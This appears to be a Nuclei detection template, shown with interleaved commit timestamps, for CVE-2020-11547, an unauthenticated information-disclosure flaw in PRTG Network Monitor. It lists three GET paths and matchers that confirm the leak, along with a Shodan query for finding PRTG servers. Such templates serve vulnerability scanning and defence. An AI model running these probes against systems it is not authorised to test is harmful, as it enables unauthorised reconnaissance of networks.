2021-09-02 11:43:37 +00:00
id : CVE-2020-11547
info :
2023-04-04 19:00:14 +00:00
name : PRTG Network Monitor <20.1.57.1745 - Information Disclosure
2021-09-02 11:43:37 +00:00
author : x6263
severity : medium
2023-04-04 19:00:14 +00:00
description : PRTG Network Monitor before 20.1.57.1745 is susceptible to information disclosure. An attacker can obtain information about probes running or the server itself via an HTTP request, thus potentially being able to modify data and/or execute unauthorized administrative operations in the context of the affected site.
2021-09-02 12:55:16 +00:00
reference :
2021-09-02 11:43:37 +00:00
- https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
2022-05-17 09:18:12 +00:00
- https://github.com/ch-rigu/PRTG-Network-Monitor-Information-Disclosure
2023-04-04 19:00:14 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-11547
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 5.3
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-11547
cwe-id : CWE-200
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:paessler:prtg_network_monitor:*:*:*:*:*:*:*:*
epss-score : 0.0011
metadata :
2023-05-04 18:30:13 +00:00
max-request : 3
2023-05-02 12:51:24 +00:00
verified : true
2023-05-04 18:30:13 +00:00
shodan-query : title:"prtg"
2023-06-12 13:24:55 +00:00
tags : cve,cve2020,prtg,disclosure
2021-09-02 11:43:37 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-09-02 11:43:37 +00:00
- method : GET
path :
2021-09-02 12:55:16 +00:00
- "{{BaseURL}}/public/login.htm?type=probes"
- "{{BaseURL}}/public/login.htm?type=requests"
2022-12-22 18:20:45 +00:00
- "{{BaseURL}}/public/login.htm?type=treestat"
2021-09-02 12:55:16 +00:00
2022-12-23 09:42:30 +00:00
stop-at-first-match : true
2021-09-02 12:55:16 +00:00
req-condition : true
matchers-condition : and
2021-09-02 11:43:37 +00:00
matchers :
2021-09-02 12:55:16 +00:00
- type : dsl
dsl :
2022-06-30 11:19:17 +00:00
- "contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"
2021-09-02 12:55:16 +00:00
2021-09-02 11:43:37 +00:00
- type : word
2022-06-30 11:19:17 +00:00
part : body
2021-09-02 11:43:37 +00:00
words :
2021-09-02 12:55:16 +00:00
- "prtg_network_monitor"
2022-12-22 18:20:45 +00:00
- "Probes"
- "Groups"
2022-12-22 18:22:47 +00:00
condition : or
2021-09-02 12:55:16 +00:00
2021-09-02 11:43:37 +00:00
- type : status
status :
- 200
2023-04-04 19:00:14 +00:00
# Enhanced by md on 2023/04/04